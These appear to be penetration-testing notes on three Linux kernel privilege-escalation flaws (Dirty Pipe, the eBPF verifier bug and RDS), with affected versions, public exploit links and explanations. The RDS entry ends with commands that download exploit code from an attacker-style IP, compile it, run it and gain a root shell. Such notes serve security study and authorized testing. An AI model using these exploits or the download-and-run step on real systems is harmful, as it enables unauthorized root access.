Kernel

Dirty Pipe

• Affected versions:

  • 5.8 ≤ version < 5.16.11

  • 5.15 ≤ version < 5.15.25

  • 5.10 ≤ version < 5.10.102

• PoC: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

Dirty Pipe (CVE-2022-0847) is a Linux kernel vulnerability that allows unprivileged local users to escalate privileges by exploiting uninitialized pipe_buffer flags. Due to a flaw in how the kernel handles pipes (copy_page_to_iter_pipe() and push_pipe()), stale flag values may grant unintended write access to pages in the page cache, even if they back read-only files.

By injecting data into these cached pages, it becomes possible to overwrite sensitive files (e.g., /etc/passwd) without modifying the actual filesystem. This enables silent privilege escalation and arbitrary code injection without detection by most integrity controls.

eBPF_verifier

• Affected versions: ≤ 4.4

• PoC: https://www.exploit-db.com/download/45010

eBPF_verifier (CVE-2017-16995) is a PE vulnerability in the Linux kernel’s eBPF (Extended Berkeley Packet Filter) verifier. The flaw resides in the verifier’s insufficient validation of register states when processing certain BPF instructions. By crafting a malicious BPF program and loading it through privileged system calls available to unprivileged users, it becomes possible to perform out-of-bounds memory reads and writes in kernel space. This enables the corruption of kernel memory structures, ultimately allowing arbitrary code execution with elevated privileges.

RDS

• Affected versions: ≤ 2.6.36

• PoC: https://www.exploit-db.com/exploits/15285

The CVE-2010-3904 vulnerability affects the RDS (Reliable Datagram Sockets) implementation in the Linux kernel prior to version 2.6.36. The function rds_page_copy_user() fails to properly validate user-supplied memory addresses during sendmsg and recvmsg calls. As a result, a local attacker can write arbitrary data to kernel memory.

This flaw allows reliable privilege escalation by overwriting function pointers or other critical kernel structures. No special capabilities are required beyond local access and the ability to open an RDS socket. Because it directly manipulates kernel memory, exploitation is fast and effective, making it highly valuable for post-exploitation or lateral movement in older systems that remain unpatched.

$ wget http://192.168.45.170:443/linux-rds-exploit.c -O /tmp/linux-rds-exploit.c
$ chmod +x linux-rds-exploit.c
$ gcc linux-rds-exploit.c -o rds
$ ./rds
[*] Got root!
# id
uid=0(root) gid=0(root)